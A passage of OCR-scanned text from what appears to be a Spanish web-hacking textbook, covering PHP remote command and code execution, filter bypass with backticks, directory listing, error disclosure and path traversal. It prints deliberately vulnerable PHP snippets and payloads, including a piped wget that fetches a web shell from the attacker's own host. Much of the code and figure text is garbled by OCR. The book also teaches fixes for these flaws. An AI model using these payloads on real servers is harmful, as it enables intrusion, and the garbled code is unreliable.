como si tuviéramos una terminal abierta dentro de nuestro objetivo; quizás no tengamos permisos de 
administración, pero eso es algo que podemos modificar. Además, podemos instalar un backdoor o 
puerta trasera para los futuros accesos. 
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<?php 

error_reporting(0); 

$nombreArchivo = $ _GETl'archivo”); 
$verArchivo = “cat “.$nombreArchivo; 
passthru($verArchivo); 

2> 


Análisis del código vulnerable a RCE: nuevamente, asignamos el 
archivo que mostrará su contenido por método GET, es decir, mediante 
la URL. Utilizaremos pipes para ejecutar el comando que deseamos. 
Notemos que, esta vez, no es necesaria la línea print, ya que la función 
passthru() muestra por sí sola la salida en pantalla. 


Figura 14. Aplicación vulnerable a RCE, 
que muestra en pantalla el contenido de un archivo. 


Explotación del RCE: esta vez, el objetivo es obtener las 
conexiones del servidor web, para lo cual necesitaremos ejecutar el 
comando netstat -putan. Debemos tener en cuenta que es necesario 
poseer permisos de root para visualizar la salida de este comando. 
Indicamos los parámetros por URL de la siguiente manera: sitio.com/ 
rce.php?archivo=unarchivo | netstat -putan. Observaremos algo similar a 
lo que muestra la Figura 15. 
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Figura 15. Obtenemos las conexiones del servidor 
web mediante la explotación de un RCE. 


Control total 


Cuarto escenario: una aplicación que se encarga de extraer un 
archivo comprimido en zip, en el directorio que se le indique. 


<?php 

error_reporting(0); 

$zip_file = archivo.zip; 

$dir_ext =$ POSTE dir”); 
shell_exec(“unzip $zip_file $dir_ext”); 
2> 


Análisis del código vulnerable a RCE: observemos que se solicita 
al usuario un directorio desde el cual extraer el contenido del 
archivo zip. A nosotros no nos importa ni el directorio ni el archivo 
zip, pero sí el vector de ataque que estamos teniendo ya que, 
utilizando una pipe luego de indicar un directorio, podemos ejecutar 
el comando que queremos. La función shell_exec() no muestra la 
salida en pantalla pero, para el uso que le daremos esta vez, no será 
necesario visualizar nada. 
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Explotación del RCE: aburridos de solamente obtener información, 
ahora vamos por el servidor completo. Es mucho más fácil de lo que 
parece; de hecho, si contamos con permisos de root, ya tenemos el 
control del objetivo. Pero, siendo que esta manera es incómoda, nuestro 
próximo paso será descargar una PHP shell dentro del servidor web. 

Subimos nuestra shell favorita a cualquier host que tengamos a 
disposición, y ejecutaremos el comando wget seguido de la dirección 
URL donde tengamos subida la PHP Shell, para que se descargue dentro 
del directorio donde estemos situados. La explotación (que esta vez es 
mediante el método POST) quedará de la siguiente manera: /directorio | 
wget “url de nuestra PHP Shell”. 


o. 
o. 
o» 
o» 
o». 
o”. 
o» 
o» 
o» 
o» 
o» 


Figura 16. Al descargar una PHP shell dentro 
del servidor web, obtenemos el control cómodamente. 


Información por eval() 


Ya hemos estudiado diversos escenarios utilizando las cuatro 
funciones PHP que permiten la ejecución de comandos. No nos 
olvidemos de Remote Code Execution, la vulnerabilidad que explota 
fallas en el uso de eval(). 

A continuación presentaremos un escenario simple y 
explotaremos el problema, aprovechándolo para obtener información 
útil acerca del servidor web. 
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<?php 
$sintax = $ POST['codigo”]; 
$check = eval($sintax); 
ifí$check == FALSEM 

echo “El codigo no es correcto”; 
) 
2> 


Análisis del código vulnerable: la aplicación cuenta con un área 
de texto donde se introduce el código PHP para verificar su 
funcionamiento. En caso de ser incorrecto, devolverá un mensaje de 
aviso. El ejemplo es simple pero nos ayudará a comprender cómo 
funciona la vulnerabilidad de Remote Code Execution y hasta dónde 
podría llegar un atacante si se encontrara con un fallo de este tipo en 
alguna de nuestras aplicaciones web. 

Explotación del RCE: la aplicación no tiene ningún tipo de seguridad 
sobre el código que se evalúa, así que un atacante puede “verificar” 
código PHP que imprima en pantalla información que comprometa el 
sistema. Visualicemos el phpinfo del servidor web, escribiendo phpinfo() 
en el área de texto donde se introduce el código a verificar. 


ma Lots 


CODIGO A ANALIZAR: 


Figura 17. Consultar phpinfo() es una de las tantas 
cosas que un atacante puede lograr explotando un RCE por eval (). 
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Las posibilidades son infinitas, ya que incluso podríamos llegar 
a ejecutar una PHP shell completa. Quizás el área de texto tenga 
un límite máximo de caracteres pero, como vimos en el Capítulo 5, 
es algo que podemos eliminar muy fácilmente. Dicho de este modo, 
cuando se trata de explotar vulnerabilidades de tipo RCE el límite 
es nuestra imaginación. 


Problema difícil 
de solucionar 


Tal como lo advierte el sitio oficial de PHP -y como ha quedado 
claro en este capítulo- las funciones system(), exec(), passthru(), 
shell_exec() y eval() suponen un enorme peligro si se utilizan con 
parámetros asignados por el usuario. Por lo tanto, se recomienda 
directamente no usarlas de esta manera. Si en la aplicación, sin 
embargo, sigue siendo necesario interactuar con el usuario desde 
este tipo de funciones, hay un problema en puerta. 

En los capítulos anteriores, donde se trataron vulnerabilidades 
basadas en fallas de seguridad sobre el uso de funciones PHP (como 
include() y requiere()), se utilizaron filtros para solucionar el asunto. 
En este caso los filtros también son aplicables, pero puede que no 
brinden completa seguridad. 


Falsa sensación de seguridad 


Analicemos un complejo filtro de RCE, programado para eliminar los 
caracteres utilizados por las funciones nombradas y también los que 


DN APROVECHAR UN FALLO EN EVAL() 


Nuevamente, el límite es nuestra imaginación. Consultar phpinfo es una de las tantas opciones útiles con 
que contamos a la hora de explotar esta falla. Lo cierto es que tenemos a disposición la posibilidad de 


ejecutar en el servidor cualquier código PHP que queramos, incluso una shell completa. 
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podrían formar parte de una codificación. Debería evitar la ejecución 
de comandos mediante el uso de system(), o similares, y a la vez no 
permitir ejecutar líneas codificadas, que podrían tener la intención de 
evadir el mecanismo de protección. 


<?php 

Sejecutar = $ _GETT'cmd”); 
Sejecutar=preg_replace("IMUVIISAHIV1/"//" Sejecutar); 
eval(Sejecutar); 

2> 


Cualquier carácter necesario para ejecutar comandos sobre el servidor 
será eliminado. Las comillas, los paréntesis, los corchetes y demás no 
están permitidos. Aun así, aunque parezca imposible, podemos evadir el 
filtro y ejecutar los comandos que queramos, mediante el operador de 
comillas invertidas (*) que funciona en PHP exactamente igual que la 
función shell_exec(). Por lo tanto, el filtro queda evadido: sitio.com/rce. 
php?cmd=echo "Is*;. Como observamos, anteponemos un echo para poder 
visualizar la salida del comando en pantalla. 


p//1127901/W eh RIDAD | 
€ 4in001 


191.311.663.104 brres libres 


Figura 18. Incluso el filtro más complejo puede ser evadido 
si utilizamos el operador de comillas invertidas. 
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Entonces, ¿cómo protegernos? Será necesario que validemos 
muy bien los datos, antes de pasar a la acción. El sitio web de PHP 
recomienda el uso de escapeshellemd() para escapar una cadena de 
comandos completa, o escapeshellarg() para escapar un argumento 
único. Por ejemplo, la función escapeshellecmd() antepone una barra a 
los siguientes caracteres: tt8; ]*?-<>*()110$1 1x0A y WXFF. La aplicamos: 


<?php 

Sejecutar = $ GETE'cmd”); 
Sescape=escapeshellcmd(Sejecutar); 
system($escape); 

os 


Como conclusión: al utilizar estas funciones asegurémonos de validar 
los datos que asigne el usuario y, por supuesto, filtremos los caracteres 
que vimos a lo largo del artículo. Por otro lado, es sumamente útil tener 
presentes las buenas prácticas descriptas en el desarrollo de código 
seguro de OWASP (www.owasp.org). También podemos emplear 
frameworks como Enterprise Security API (ESAPI), una colección 
gratuita y abierta con todos los métodos que un desarrollador necesita 
para construir una aplicación web segura. Encontramos más información 
al respecto en el siguiente enlace: www.owasp.org/index.php/ 
Category:OWASP_Enterprise_Security_API/es. 
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a RESUMEN 


Remote Command Execution y Remote Code Execution son vulnerabilidades potencialmente 
peligrosas. Una aplicación web con un fallo de este tipo puede comprometer todo el servidor. En 
este capítulo quedó claro cómo se produce la vulnerabilidad de RCE, llevando a la práctica distintos 
escenarios donde se vieron involucradas las funciones PHP que se consideran peligrosas a la hora 
de programar una aplicación web segura. Analizamos un complejo filtro anti-RCE y vimos que, incluso 
así, es posible evadirlo. Debemos tener sumo cuidado a la hora de programar nuestras aplicaciones 


si utilizamos estas funciones. 
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Actividades 


TEST DE AUTOEVALUACIÓN 


1 ¿Cuál es la principal diferencia entre Remote Code Execution y Remote 
Command Execution? 


2 ¿Cuáles son las funciones PHP involucradas en Remote Command Execution? 


3 ¿Cuál es la función en la cual se basa la vulnerabilidad de Remote Code 
Execution? 


4 ¿Qué son las pipes y cómo funcionan? 


5 ¿Qué datos útiles podemos conseguir del servidor web aprovechando un RCE? 


EJERCICIOS PRÁCTICOS 


1 Programe cuatro aplicaciones que utilicen las funciones system(), exec(), 
passthru() y shell_exec() y analice las diferencias entre ellas al ejecutar 
un comando. 


2  Programe una aplicación que utilice la función eval() y visualice mediante 
ella el archivo phpinfo de su servidor. 


3  Programe una aplicación vulnerable a RCE que realice un ping a la dirección IP 
que reciba como parámetro. Explote la falla y averigie los procesos que 
se están ejecutando en su servidor web. 


4 Descargue una PHP shell al servidor web explotando una aplicación vulnerable 
a RCE. 


5  Desarrolle una aplicación segura contra las vulnerabilidades aprendidas 
en este capítulo. 


dol PROFESOR EN LÍNEA 


Si tiene alguna consulta técnica relacionada con el contenido, puede contactarse 
con nuestros expertos: profesorOredusers.com 
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Errores al descubierto, filtrado incorrecto de datos, acceso a 


directorios con información sensible... son solo algunas de 
las malas prácticas de configuración que analizaremos en este 
capítulo. Nos pondremos en la piel del atacante y aprenderemos 


a configurar de forma segura nuestras aplicaciones web. 
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Datos útiles sin esfuerzo 


Cuando realizamos una auditoría a una aplicación web, debemos 
tener presentes algunas técnicas muy simples pero efectivas a la hora 
de recopilar información útil sobre el objetivo. 

Apuntando al descuido o desconocimiento del administrador 
sobre las configuraciones de seguridad, obtendremos lo que nos 
interesa casi sin esfuerzo. 

Usualmente, dentro de un servidor web se 
encuentran archivos que contienen información 


CONFIGURAR BIEN sobre las características y configuraciones 

LAS APLICACIONES de su sistema. Si bien esto es completamente 
normal, algunos de ellos no son necesarios o, si 

EVITA RIESGOS DE lo son, puede que no estén lo suficientemente 

SEGURIDAD DEL ocultos a la vista de posibles atacantes e 


incluso contengan más información de la que 


SISTEMA deberían. Por otro lado, como mencionamos en 


e 


un principio, utilizar las configuraciones por 

defecto de las aplicaciones que instalemos 
en nuestro servidor puede ocasionar problemas de seguridad. 

Debido a que los atacantes siempre tienen en cuenta estas 

cuestiones, en este capítulo prestaremos especial atención a los 
errores más comunes que pueden cometerse al configurar aplicaciones. 
Revisaremos configuraciones inseguras y conoceremos consejos útiles 
a la hora de programar nuestras propias aplicaciones, para evitar 
proporcionar al hacker información comprometedora sin que deba 
hacer esfuerzo alguno. 


www.sitio.com/phpinfo 
phpinfo 


Hacker Servidor web 


Figura 1. Muchos servidores web permiten acceder 
fácilmente a información de gran utilidad para un ataque. 
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Robots a la vista 


Los protagonistas de esta sección serán los robots, crawlers o 
arañas de internet. Sean buenos o malos, todos comparten una función 
principal: analizar el contenido de las páginas web que visitan. Si bien 
esto puede sonar inofensivo, decimos que los hay buenos y malos 
porque la clasificación depende de la entidad a la que pertenezcan, de 
sus características y de lo que hagan con la información que recopilan. 


uE 


Figura 2. Los crawlers o arañas por lo general parten de un directorio 
web para recorrer todas las páginas, saltando de enlace en enlace. 


Los robots considerados buenos son aquellos que pertenecen a 
entidades como Google u otros buscadores, y se encargan de analizar la 
información del sitio web para catalogarla y mostrarla en los resultados 
de búsqueda de una forma adecuada. El objetivo final es ofrecer a los 
usuarios un resultado lo más aproximado posible al que han buscado. 

Por otro lado, están los robots o crawlers malos, que analizan 
el contenido del sitio web en busca de correos electrónicos u otra 
información útil para spam. 

Otro ítem en la clasificación de los robots en buenos y malos es 
el acatamiento a las directivas del archivo robots.txt: los primeros las 
respetan, mientras que los últimos suelen pasarlas por alto. 

¿Qué clase de directivas tiene este archivo? Los webmasters le 
dan varias utilidades, como impedir el acceso a determinados robots, 
eliminar contenido duplicado, asignar un sitemap, privatizar contenido 
para que no aparezca en los listados de búsqueda, etcétera. 
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Doro Preto 


¡tt /Aocalhost/robots.ta | +] j 
$ 4 toos o 1 ' 
O Onebier di Cool Y 055 LA Forms Ml lmeges: UY intoemetor [ll Macelereouar FP Outline: Y fear A Tools” ME Vier Source" 1] Optiod 
User-agent: * 
Disallow: /wp-admin/ 
Disallow: /wp-includen/ 
Disallow: /2012_u14/ 
Disallow: /archivo/ 
Disallow: /aescargas/ 
Disallicw: /S5ML1/ 
Disallow: /ftirmas/ 
Disaliow: /mar kup/ 
Disallow: /phpmyadmin 
Disaligw: /publicidad/ 


Figura 3. El archivo robots.txt, entre otras acciones, 
especifica directorios a los que el crawler no debe acceder ni indexar. 


Si el archivo robots.txt está presente dentro de un sitio puede ser 
un gran aliado en la búsqueda de información. Teniendo en cuenta las 
directivas que se mencionan, podemos imaginar que bajo el parámetro 
Disallow se encuentran las direcciones URL de zonas privadas, archivos 
y directorios con información de gran interés para un atacante. 

Consultar el archivo robots.txt puede facilitar la tarea de hallar el 
panel de administración de un sitio (algo que normalmente resulta 
tedioso, incluso cuando ya se poseen los datos de acceso). 

Como hemos explicado anteriormente, dentro de este simple 
documento de texto se especifican aquellos directorios que el robot 


no debe indexar, y claramente uno de ellos podría ser el acceso a la 
administración del sitio. 


uv VW 
ROBOTS POPULARES DE INTERNET 


Los robots de los buscadores más conocidos de internet son muy conocidos y tienen su propio nombre: 
por ejemplo, Slurp es el crawler de Yahoo! y BingBot pertenece al buscador Bing. Por su parte, Google 
cuenta con más de uno: el más conocido es GoogleBot, pero también existen GoogleBot-Image para 
indexar imágenes y Mediapartners-Google para Adsense. 
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Ahora bien, si somos un atacante, ¿cómo nos convertimos 
en un robot y obtenemos todas las páginas del sitio, incluyendo 
los directorios que no deberíamos encontrar? 


Uso de un crawler 


Si bien el archivo robots.txt puede proporcionar información 
muy interesante, no siempre está presente en el servidor. Si, aun así, 
queremos obtener un mapeo completo del sitio (incluyendo algunos de 
los directorios privados), tendremos que convertirnos en robots mediante 
el uso de herramientas programadas específicamente para esto. 

El crawler eNYe Spider es una excelente opción, que podemos 
descargar gratuitamente desde la página de eNYe Sec, www.enye-sec. 
org/rel/enye-spider. A la manera de un web crawler, analiza el sitio 
indicado y devuelve como resultado su estructura. Además, alerta 
sobre posibles archivos vulnerables, y permite usar un servidor proxy 
y guardar el análisis en nuestra computadora. 


oNVO Bos v0mos un grupo de person»s 


> ' interesadas por la veguricad informática sm 
a eNYe-Spider v1 .C rangúe Mo dr Ano de mcro 

Muestra intención es pubir ar miormacón para 
Programa que aratiza remotamente ma web sacando la estructura de hcheros y Orectocos atentar COIDOCAN ayudar a la comunidad ala 


VANOS, (0 que 68 UN APIO O VEN Cra vez que nosotros mimos aprendemos con eto 


Esta dseñado para que compruebes las vuinerabiidades de tu web e incaye algunos extras 
postildad de uar un servidor prom hacrimna les Aeherne que acoptan parámetos por GF To 


4 , comentarios 

POST permite escribir anotaciones sobre os escaneos navegador eeb mtegrado y permite c recientes 

gueriar los aná en reco - Megadebd! en E rtac os 
> RaSe en briaces 

Descargar | ar caotura de pantalla * Mejadem en Ertaces 


Enquetas 
Entradas recientes 
> Banerl Dig ISS Adwisory 
> Cambsamros a WordPress 
* jocría Scan 
: Shetcodes y Explots en Win12 
> Explotación de servicxa wet 


Figura 4. Una de las herramientas para obtener 
la estructura de un sitio web es el crawler de eNYe Sec. 


Una vez descargado e instalado eNYe Spider, solo debemos insertar 


la dirección URL de nuestro objetivo en el campo de texto de la esquina 
superior izquierda (y debajo, opcionalmente, un proxy) y luego 
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presionar el botón Comenzar. A medida que el crawler los encuentre, 
aparecerán los documentos y directorios que contiene el sitio web. 
También podemos utilizar el navegador integrado, a la derecha, para 
ver los archivos desde el propio crawler. 


MD o. ads cue Y amara de sm 


ED A A A A A Le es ARM a AJA TD 


ro A A 
rate ms 

ano 

gh 

> 


Figura 5. Obtenemos un mapeo completo 
del sitio web que decidimos analizar. 


Otra alternativa es consultar las opciones disponibles en la suite 
Backtrack o en Kali-Linux (evolución de Backtrack). Dentro de la 
categoría Web crawlers encontraremos más de una herramienta, con 
diferentes parámetros y opciones para conseguir esta información. 
Algunas pueden enfocarse en encontrar formularios y accesos, hasta 
hallar vulnerabilidades en los archivos del sitio. 


Acceso a directorios privados 


Una vez definida la estructura del sitio, con sus archivos y 
carpetas, debemos fijarnos a cuáles podemos acceder sin que se 
nos muestre un error 403 de permisos. Es bastante frecuente que los 
administradores dejen habilitado el listado de directorios, dándonos 
la posibilidad de acceder fácilmente a todo el contenido del sitio. La 


»  Wwww.redusers.com www.detodoprogramacion.com 


WEB HACKING VEZ 227 


manera de comprobar si el servidor está mal 


configurado es intentar acceder a un directorio ES IMPORTANTE NO 
en lugar de un archivo específico. Si el DEJAR HABILITADO 
administrador dejó habilitado el listado de 

directorios (error conocido por su nombre en EL LISTADO 
inglés como Directory Listing), el servidor DE DIRECTORIOS 
mostrará todos los documentos de la carpeta e 

incluso nos permitirá navegar entre los archivos, EN EL SERVIDOR 
subiendo y bajando los niveles de los directorios. 

Así, podemos navegar las carpetas y buscar -, 5 
scripts o documentos con información interesante para utilizar 


en un posterior ataque. 


O uo 01 iras Manta Fenton 


nde: ct /taras + 


$ A loamnest 


O Ou di Cocer y 3 [town Ml meger Ú momnor Msc / Quer Y tear K Tout" ME Ver dcurce A Option 


Index of /Extras 


[ICO] Name Last modied Sure Desenpeios 


[DR] Paussnt Directory 


[DR] Administracion:  05-May-3013 03.01 

8 Cosiguracos php 0%. Aug-20 10M 94 
ll Fommbaricphp  21-48-20120429 1.9K 
[l  GuetBook php 25-Mar-2012 16:05 1. 6K 
[DIR] JQuery 05-May-2013 03-01 

0) Ladaaká 231-2012 01:13 1 0K 
IJ  Mesajeship  25-Mar-20121635 859 
[DR] Prrado 05-May-2013 0301 

[l  sdemis 22-Hb-2012 04:49 1 1K 
[TXT] docente tas 05-Aug-2012 0513 93 
[IMG] imazen jog 25-Mar-2012 1529 211 
f] »cpbp 06-Sep-2012 0135 300 


Figura 6. Se considera a Directory Listing 
como un grave error de configuración. 


Configuración segura 


Si observamos este problema desde la óptica del administrador o 
encargado de la seguridad del sitio, ¿cómo podemos evitar el listado 
de directorios? Lo que se debe hacer es añadir una directiva en 
el documento .htaccess, que prohíbe el listado de contenidos. De 
este modo, cuando se intente acceder a un directorio sin especificar 
un archivo, el servidor mostrará un error de permisos 403, 


www.detodoprogramacion.com www.redusers.com <« 


228 —MEZAS 8. REVELACIÓN DE INFORMACIÓN 


solucionando por completo el problema del listado de directorios. 
La directiva que debemos añadir al archivo .htaccess es: Options - 
Indexes. Si por alguna razón necesitamos ver los contenidos, basta 
con remplazar la directiva anterior por la siguiente: Options +Indexes. 
También tenemos la posibilidad de filtrar por tipo de archivo, 
especificándolo de esta manera: IndexlIgnore *.php *.mp3 (con esta 
instrucción se listarán todos los archivos, excepto los de extensión 
.php y .mp3). Cada carpeta de nuestro sitio puede tener un 
documento .htaccess con directivas diferentes. 


Dio rocarron toa Pratos 


KI bortrdder Le 
e % techos 
O Duavie- de Cocuies: Y C35 [A Parra: E imeger UY itoemation: ll Misceleneous: 7 Oulica: / Bescar A Tout" E Vies hour A Cpuens 
Forbidden 


You dont have permissica to access Extras on tus server 


A AAA AA 
A ASS EIA ATEN od 
A 


lá Maoces 
Options -Indenes 


Figura 7. Alcanza con una sola línea en el archivo .htaccess 
para solucionar el problema del listado de directorios. 


Errores al descubierto 


Intencionalmente o no, todos nos hemos encontrado alguna vez con 
una página que, al cargar su contenido, devolvió una larga recopilación 
de errores. Como la mayoría de los usuarios, si no los estamos 
buscando intencionalmente no les prestaremos atención, frustrándonos 
al ver la página con contenido deformado en lugar de verla bien. 

Sin embargo, poniéndonos nuevamente en la piel del atacante, si 
los errores provienen de nuestra página objetivo tenemos una buena 
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noticia: acabamos de conseguir otro punto interesante para, como 
mínimo, obtener información útil. 

Los orígenes de estos fallos pueden ser varios y dependen del 
código en cuestión. A veces se trata de errores en la conexión a la base 
de datos SQL, o de un error al consultarla. Por otro lado, puede que se 
esté tratando de incluir un archivo que por alguna razón ya no existe 
o cambió de ubicación. También podría ocurrir que una función de la 
aplicación esté recibiendo parámetros incorrectos, lo que genera un 
error en la ejecución del script. 

En definitiva, los errores pueden deberse a innumerables 
causas; lo importante es saber comprenderlos y tomar nota de 
los datos que informan. 


MD Ss tema GESTOR de EMPRESAS - Atril Fetor 


SISTEMA GESTOR de EMPRESAS Ll 
$ 4 she c H- 
O Dustie" di Comas” Y 055 [] Formar Bl images” Y itomañar” [trees Y Ctina Y Pasar K Tonto ME View Gon A) Options” 
Wameg mysd_coumect() Cant connect to local MySQL server brough sockort in Camp www GDE index php on le 2 
Wamng fle_pet_coments0) [funcion fle-get-conterts] URL fle-access e disabled mn the serves configaration e Camp rw GDE index php on Ine 16 


Wang mvsg_fetch_arravÚ expects parametes ] to be resowce. boolean green in O wap www GDE index php on ne 46 


Figura 8. Es común encontrar páginas que muestran 
errores al cargar su contenido. 


DN MÁS SEGURIDAD CON .HTACCESS 


El archivo .htaccess puede ayudarnos a mejorar la seguridad de nuestro servidor web. Permite establecer 


directivas de control de acceso a las carpetas, personalizar los errores HTTP para no mostrar informa- 
ción del sistema, restringir el acceso a determinadas direcciones IP, crear redirecciones y manejar la 
caché, entre otras opciones importantes. 
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Provocar un error 


Los errores pueden aparecer sin que los llamemos y, si no es así, 
tendremos que encontrarlos nosotros mismos. Provocarlos es fácil, 
pero lo difícil es hallar dónde hacerlo. 

Para empezar, tendremos que observar muy bien las variaciones 
en la URL al ir navegando a través del sitio e interactuando con él. 
Tengamos presente que una falla no solo puede generarse por GET (es 
decir, a través de la URL), sino también por POST, por lo cual debemos 
analizar detenidamente el comportamiento del sitio objetivo. 

En las páginas de noticias o de venta de productos suele 
observarse que cada nota o ítem de venta tiene un identificador 
numérico, que es llamado desde la URL para imprimir en pantalla 
su información (podremos notarlo al observar una dirección como 
la siguiente: www.sitio.com/noticias.php?id=1234). El número 
que aparece al final suele estar estrechamente relacionado con el ID 
de una tabla SQL, y por lo tanto, indicar un identificador no válido 
podría provocar un error. 

Otro caso común es llamar a través de la URL el archivo a ser 
mostrado en pantalla, que puede ser un ítem del menú del sitio web 
(por ejemplo, www.sitio.com/index.php?pagina=contacto.php). 
Quizás no se especifique dentro del código cuáles son los archivos que 
se permiten incluir, de modo que se intentará mostrar cualquier página 
o documento que se indique a través de la URL. Si es así, podremos 
cambiar el archivo que se incluye por uno inexistente, logrando que la 
función include() o require() utilizada no encuentre el documento y se 
genere un error en la aplicación. 


www.sitio.com/index.php?page=inexistente 
A AAA<> <á<á INII <<AA>>——4+2 


Warning: [function.require]: failed (...) 


Hacker Aplicación web 
vulnerable 


Figura 9. Si los errores no aparecen solos deberemos, 
como atacantes, provocarlos por nuestros propios medios. 
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Análisis del error 


De un error podemos obtener dos datos: por un lado, la 
ruta completa del archivo que sufrió el error, y por el otro, la 
indicación de que hay una falla grave, que implica alguna de las 
vulnerabilidades antes mencionadas. Es importante comprender 
siempre por qué se produce un error y cuál es la función afectada, 
para luego considerar la posibilidad de realizar un ataque mediante 
ese vector (que podría ser una explotación de tipo inyección SQL, 
como veremos en el próximo capítulo). Analicemos algunos errores 
que pueden surgir en una auditoria web: 


Warning: require(inexistente.php) [function.require]: failed to open stream: 
No such file or directory in /(home/www/misitio/principal/index.php on line 4 


Este caso se produce en la función require, al intentar incluir un 
archivo inválido o inexistente, y nos informa que no se encuentra el 
documento solicitado dentro del directorio de la aplicación. Como 
mencionamos antes, obtuvimos dos datos: la ruta completa de la 
aplicación web (/home/www/misitio/principal/index.php) y un posible 
vector de ataque para realizar una inclusión de archivos (tal como 
vimos en el Capítulo 6). Si se utilizaran las funciones include, 
include_once o requiere_once el error se produciría igual, permitiendo 
explotar la falla de la misma manera. 


O cito o. 


AS "panpnez merito | 
$ % unen 1) 
Ú bustie” di Coma” Y Ci% [] tumor Bl maga” Y btormatian” El Mncetaraaus: / Caña Y taco A Toalar ME Vionieto” A Option 


Wang Me ge cotentoipervustene) [bartos Me grt coments) laded to open stream Do such de er drectory a C wmmp vrs Weks Vulbrrables E php 06 me 4 


Figura 10. La función file_get_contents() también 
devuelve un error si recibe un archivo inválido o inexistente. 
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Warning: mysql_result(): supplied argument is not a valid MySQL result 
resource in /home/public_html/misitio/principal/index.php on line 13 


Un error como este se produce al consultar una tabla SOL indicando 
un ID no válido. El caso fue testeado sobre una aplicación web que 
presentaba la siguiente dirección: www.sitio.com/noticias.php?id=1. 
Al modificar el ID por un número negativo (www.sitio.com/noticias. 
php?id=-1234) se obtuvo como resultado el típico error por realizar 
una consulta incorrecta a la base de datos SQL. Es posible ver la ruta 
completa del archivo (lo que se conoce como Full Path Disclosure) 

y aparece un punto de partida para ejecutar una inyección SQL. 


Ocultar los errores 


Si bien ocultar el error no resuelve la falla, en caso de que se 
produzca uno inesperado evitaremos dejar el camino libre al atacante. 
Volviendo al papel del administrador de seguridad y/o programador 
con intenciones de desarrollar aplicaciones seguras, tenemos un 
problema por resolver: sabemos que los errores no deben quedar a 
la vista, no solo por cuestiones de seguridad sino porque tampoco 
es agradable para el usuario ver que la página se deforma. 


2 


A www.sitio.com/noticias.php?id=-1234 


Hacker Aplicación web 
vulnerable 


Figura 11. Ocultando los errores evitaremos darle información al atacante 
y le complicaremos la tarea de saber si la aplicación es vulnerable o no. 


A continuación conoceremos dos maneras interesantes de resolver 
la cuestión, ambas muy efectivas. 

La opción que utilicemos dependerá de si estamos administrando 
el sistema o si somos los desarrolladores de la aplicación. 
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Un modo de ocultar los errores es añadir una simple línea al 
comienzo de cada script. La función error_reporting() establece qué 
errores de PHP serán notificados y, si le asignamos como parámetro 
el número cero (0), se desactivará toda notificación: 


<?php 

error_reporting(0); 

if (isset($_GETE' pagina DM 
$pag = $ GETE'pagina”]); 

file_get_contents($pag); 

) 

2> 


El código que acabamos de ver tiene un problema de seguridad muy 
grave, que debe ser solucionado aplicando filtros, como hemos visto 
en capítulos anteriores. La función error_reporting(0) evitará que se 
muestren errores cuando se intente comprobar el fallo de seguridad 
mediante valores incorrectos, pero en el caso de que se solicite ver 
un documento existente lo mostrará sin ningún problema. 


[e CawampiwwwWebsVulnerablesufi.php - Notepad=+ 


Archivo Editar Buscar Vista Codificación Lenguaje Configuración Macro Ejecutar Plugins Ventana; 


oOUER +. .BIg¿DO CIA |: 2386 1B0/e 2 
E hipro | 


<?php 


error_raporting("); 


A if (isset ($ GET['pagina']))1 
6 $pag = $_GET['pagina']; 


file get_contents ($pag) ; 


-2> 


PHP Hyperted Preprocessor file length :134 lines: 11 


Figura 12. Mediante la función error_reporting(0) 
desactivamos toda notificación de posibles errores. 
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También es posible ocultar los errores mediante el archivo 
de configuración php.ini, en el cual deberemos buscar la directiva 
display errors para cambiar su valor de On a Off. A diferencia de la 
anterior, esta solución puede ser más rápida y fácil de aplicar para 
los administradores que no tienen nada que ver con el desarrollo 
o la programación de las aplicaciones web. 

Las notificaciones de error son muy útiles para los 
programadores, porque ayudan a detectar y solucionar fallos 
rápidamente. Por lo tanto, mientras la aplicación esté en desarrollo 
siempre estarán presentes, pero deberán quedar ocultas a la hora 
de publicar o subir el sitio a internet. 


— Regreso al origen 


El ataque conocido como Path Transversal tiene el objetivo de 
acceder a los archivos que pertenecen al sistema, que lógicamente 
se encuentran fuera de la carpeta principal del sitio web. El objetivo, 
entonces, es llegar a la raíz del servidor, pudiendo visualizar 
información que va desde los registros y configuraciones hasta 
el archivo de contraseñas /etc/passwd (en el caso de Linux). 


Dos puntos y una barra 


Para llevar a cabo un ataque de Path Transversal se necesitan los 
caracteres dot dot slash (../) y un código vulnerable a File Inclusion 
o File Disclosure (ya que el ataque se explota mediante fallas que 
permitan la inclusión o lectura de cualquier archivo). 


MEJOR PREVENIR QUE LAMENTAR 


Aunque confiemos en que nuestra aplicación web está programada de una forma segura, es acon- 
sejable desactivar la notificación de errores siempre. Recordemos que no hay sistema 100% seguro 
y que inesperadamente puede producirse un error en nuestra aplicación, que seguramente no que- 


rremos que un atacante vea. 
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/index. ¿dScphp2pa8"»-/-/1088/ apache_sIorios. ./../logs/apache_error.log 


apache_error. PA: 5 


Hacker Aplicación web 
vulnerable 


Figura 13. La técnica de Path Transversal consiste en navegar 
por los archivos del sistema utilizando los caracteres . ./. 


Tal como haríamos si tuviésemos abierta una terminal en nuestro 
objetivo, debemos navegar a través de los directorios utilizando 
los caracteres ../, retrocediendo hasta la raíz para luego solicitar los 
archivos del sistema que nos interese ver. Analicemos la explotación 
de un código vulnerable: 


<?php 

$plantilla = $ GETE'plantilla”]; 
include("/home/www/plantillas/”. $plantilla); 
?> 


Si quisiéramos ver el archivo de logs tendríamos que retroceder los 
directorios que sean necesarios para luego especificar la ruta del registro. 
Provocando un error del modo en que aprendimos podremos, al menos, 
conocer exactamente dónde estamos ubicados, lo que nos ayudará a 


D CRAWLERS EN KALI-LINUX 


Kali-Linux (www.kali.org) es la evolución de Backtrack, ya que en breve este último quedará 
discontinuado. Dentro del menú Kali-Linux en el ítem Aplicaciones web, subitem Indexadores web, 
tenemos la excelente herramienta OWASP ZAP, que va mucho más allá de un simple crawler y 


posee una amigable interfaz gráfica. 
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encontrar fácilmente la carpeta de logs. La dirección URL quedará similar 
a la siguiente: www.sitio.com/index.php?plantilla=../../logs/apache_ 
error.log y, si escribimos bien la ubicación del log, observaremos algo 
similar a lo que muestra la Figura 14. 
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Figura 14. Visualizamos el archivo apache_error.1og, 
mediante la técnica de Path Transversal. 


Archivos al descubierto 


En esta sección del capítulo analizaremos la vulnerabilidad de 
File Disclosure: archivo al descubierto, 
basada en fallos de seguridad al usar la función 


FILE DISCLOSURE readfile() u otras similares. Es muy parecida 
PERMITE VER a File Inclusion, pero más potente, ya que 


mediante su utilización podremos ver incluso 


INCLUSO EL CÓDIGO el código fuente de archivos PHP. 
FUENTE DE UN Según el sitio oficial de PHP, la función 


readfile() lee un fichero y lo escribe en el buffer 


ARCHIVO PHP de salida. Aprovecharemos esto para leer los 


ee 


archivos del sitio y del sistema que pueden 
contener información útil para un ataque. 


Veamos un código vulnerable a File Disclosure: 
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<?php 

